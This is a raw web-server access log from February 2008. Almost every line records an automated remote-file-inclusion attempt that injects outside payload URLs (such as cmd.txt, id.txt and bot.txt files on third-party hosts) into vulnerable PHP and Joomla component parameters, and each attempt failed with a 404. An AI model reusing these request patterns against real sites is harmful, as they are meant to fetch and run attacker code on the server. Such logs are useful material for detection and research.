209.85.107.22 - - [22/Feb/2008:08:03:21 -0800] "GET /lang=http://www.uptours.com/ekstras/images/bypass2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [22/Feb/2008:08:03:23 -0800] "GET /logs/lang=http://www.uptours.com/ekstras/images/bypass2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:03:39 -0800] "GET /logs/access_080126.log/include/status_top_x.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:03:39 -0800] "GET /include/status_top_x.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:03:39 -0800] "GET /logs/include/status_top_x.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [22/Feb/2008:08:04:12 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.45.190.173 - - [22/Feb/2008:08:05:18 -0800] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [22/Feb/2008:08:05:18 -0800] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [22/Feb/2008:08:05:19 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.80.254 - - [22/Feb/2008:08:05:43 -0800] "GET /logs/Bughttp://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
85.214.80.254 - - [22/Feb/2008:08:05:44 -0800] "GET /Bughttp://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:08:06:04 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:08:06:04 -0800] "GET /logs/access.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:08:06:04 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:08:06:05 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:08:06:05 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:08:06:05 -0800] "GET /logs/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
194.79.75.195 - - [22/Feb/2008:08:06:19 -0800] "GET /logs/access_080211.log/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [22/Feb/2008:08:06:19 -0800] "GET /logs/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.31.156.195 - - [22/Feb/2008:08:06:43 -0800] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.31.156.195 - - [22/Feb/2008:08:06:44 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.90.206.110 - - [22/Feb/2008:08:06:46 -0800] "GET /logs/access_080201.log/lang=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.90.206.110 - - [22/Feb/2008:08:06:47 -0800] "GET /lang=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.90.206.110 - - [22/Feb/2008:08:06:47 -0800] "GET /logs/lang=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.16.96.219 - - [22/Feb/2008:08:07:04 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.209.196 - - [22/Feb/2008:08:07:06 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.209.196 - - [22/Feb/2008:08:07:06 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.209.196 - - [22/Feb/2008:08:07:07 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.31.156.195 - - [22/Feb/2008:08:07:19 -0800] "GET /logs/access_080122.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.76.29 - - [22/Feb/2008:08:07:48 -0800] "GET /logs/access_080211.log/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [22/Feb/2008:08:07:48 -0800] "GET /logs/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.197.160.6 - - [22/Feb/2008:08:08:07 -0800] "GET /logs/access_080201.log//errors.php?error=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [22/Feb/2008:08:08:52 -0800] "GET /logs/access_080201.log/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:08:08:56 -0800] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:08:08:56 -0800] "GET /logs/access_080201.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
208.226.79.133 - - [22/Feb/2008:08:09:00 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [22/Feb/2008:08:09:00 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [22/Feb/2008:08:09:01 -0800] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.209.196 - - [22/Feb/2008:08:09:07 -0800] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.209.196 - - [22/Feb/2008:08:09:08 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.209.196 - - [22/Feb/2008:08:09:08 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.209.196 - - [22/Feb/2008:08:09:13 -0800] "GET /logs//claroline/tracking/userLog.php?rootSys=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.189.27.130 - - [22/Feb/2008:08:09:14 -0800] "GET /logs/scripts.log//download.php?upload_filename=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.189.27.130 - - [22/Feb/2008:08:09:14 -0800] "GET /logs//download.php?upload_filename=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.209.196 - - [22/Feb/2008:08:09:27 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [22/Feb/2008:08:09:56 -0800] "GET /logs/access_080201.log/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.90.206.110 - - [22/Feb/2008:08:10:06 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.90.206.110 - - [22/Feb/2008:08:10:07 -0800] "GET //skin/zero_vote/error.php?dir=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.90.206.110 - - [22/Feb/2008:08:10:11 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.223.16.102 - - [22/Feb/2008:08:10:30 -0800] "GET /logs/access.log//errors.php?error=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.223.16.102 - - [22/Feb/2008:08:10:30 -0800] "GET /logs//errors.php?error=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.194.74.238 - - [22/Feb/2008:08:10:52 -0800] "GET /index.php?option=com_joomlastats&task=cat_view&gid=&mosConfig_absolute_path=http://nybap.org/templates/rose.gif?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
82.194.74.238 - - [22/Feb/2008:08:10:52 -0800] "GET /logs/index.php?option=com_joomlastats&task=cat_view&gid=&mosConfig_absolute_path=http://nybap.org/templates/rose.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
74.6.19.236 - - [22/Feb/2008:08:11:18 -0800] "GET /retreat1/webcam/?M=D HTTP/1.0" 200 720630 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:08:11:43 -0800] "GET /logs/scripts.log//download.php?upload_filename=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:08:11:43 -0800] "GET /logs/scripts.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:08:11:44 -0800] "GET //download.php?upload_filename=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:08:11:44 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:08:11:44 -0800] "GET /logs//download.php?upload_filename=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:08:11:45 -0800] "GET /logs/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.198.106.84 - - [22/Feb/2008:08:11:53 -0800] "GET /logs/access_080120.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.84 - - [22/Feb/2008:08:11:53 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.84 - - [22/Feb/2008:08:11:54 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.84 - - [22/Feb/2008:08:11:54 -0800] "GET /logs/access_071220.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.67.26.200 - - [22/Feb/2008:08:11:55 -0800] "GET /logs/access_080120.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.26.200 - - [22/Feb/2008:08:12:01 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.26.200 - - [22/Feb/2008:08:12:01 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.26.200 - - [22/Feb/2008:08:12:01 -0800] "GET /logs/access_071220.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.88.23.149 - - [22/Feb/2008:08:12:26 -0800] "GET /logs/access_080120.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.23.149 - - [22/Feb/2008:08:12:27 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.23.149 - - [22/Feb/2008:08:12:27 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.23.149 - - [22/Feb/2008:08:12:27 -0800] "GET /logs/access_071220.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.134.235.165 - - [22/Feb/2008:08:12:46 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [22/Feb/2008:08:12:47 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [22/Feb/2008:08:12:48 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.237.162 - - [22/Feb/2008:08:13:15 -0800] "GET /logs/access_080211.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.237.162 - - [22/Feb/2008:08:13:15 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.237.162 - - [22/Feb/2008:08:13:15 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.24.16 - - [22/Feb/2008:08:13:15 -0800] "GET /logs/access_080211.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
87.106.24.16 - - [22/Feb/2008:08:13:16 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
87.106.24.16 - - [22/Feb/2008:08:13:16 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.82.132.50 - - [22/Feb/2008:08:13:25 -0800] "GET /logs/access_080201.log//update/update5.php?lang=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.82.132.50 - - [22/Feb/2008:08:13:25 -0800] "GET //update/update5.php?lang=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.82.132.50 - - [22/Feb/2008:08:13:26 -0800] "GET /logs//update/update5.php?lang=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.61.90 - - [22/Feb/2008:08:13:28 -0800] "GET /logs/access_080211.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.61.90 - - [22/Feb/2008:08:13:28 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.61.90 - - [22/Feb/2008:08:13:28 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.107.22 - - [22/Feb/2008:08:13:45 -0800] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.uptours.com/ekstras/images/bypass2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [22/Feb/2008:08:13:45 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.uptours.com/ekstras/images/bypass2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [22/Feb/2008:08:13:45 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.uptours.com/ekstras/images/bypass2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.16.16.208 - - [22/Feb/2008:08:13:55 -0800] "GET /logs/access_080211.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [22/Feb/2008:08:13:55 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [22/Feb/2008:08:13:56 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.20.116 - - [22/Feb/2008:08:13:58 -0800] "GET /logs/access_071101.log HTTP/1.0" 200 4709 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.84.237.162 - - [22/Feb/2008:08:14:07 -0800] "GET /logs/access_080122.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.61.90 - - [22/Feb/2008:08:14:20 -0800] "GET /logs/access_080122.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.76.150.198 - - [22/Feb/2008:08:14:20 -0800] "GET /logs/access_080211.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.76.150.198 - - [22/Feb/2008:08:14:21 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.76.150.198 - - [22/Feb/2008:08:14:21 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.24.16 - - [22/Feb/2008:08:14:22 -0800] "GET /logs/access_080122.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
78.108.81.31 - - [22/Feb/2008:08:14:39 -0800] "GET /logs/access_080211.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.108.81.31 - - [22/Feb/2008:08:14:40 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.202.2.183 - - [22/Feb/2008:08:14:40 -0800] "GET /logs/access_080211.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.183 - - [22/Feb/2008:08:14:40 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.108.81.31 - - [22/Feb/2008:08:14:40 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.202.2.183 - - [22/Feb/2008:08:14:41 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.183 - - [22/Feb/2008:08:14:41 -0800] "GET /logs/access_080211.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.183 - - [22/Feb/2008:08:14:41 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.183 - - [22/Feb/2008:08:14:42 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.183 - - [22/Feb/2008:08:14:43 -0800] "GET /logs/access_080211.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.183 - - [22/Feb/2008:08:14:43 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.183 - - [22/Feb/2008:08:14:43 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.248.168.70 - - [22/Feb/2008:08:14:49 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.248.168.70 - - [22/Feb/2008:08:14:49 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
69.16.211.62 - - [22/Feb/2008:08:14:58 -0800] "GET /logs/access_080122.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.89.74.40 - - [22/Feb/2008:08:15:05 -0800] "GET /logs/access_080211.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.139.79.29 - - [22/Feb/2008:08:15:06 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sang.ironhacker.com/tmp/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.74.40 - - [22/Feb/2008:08:15:06 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
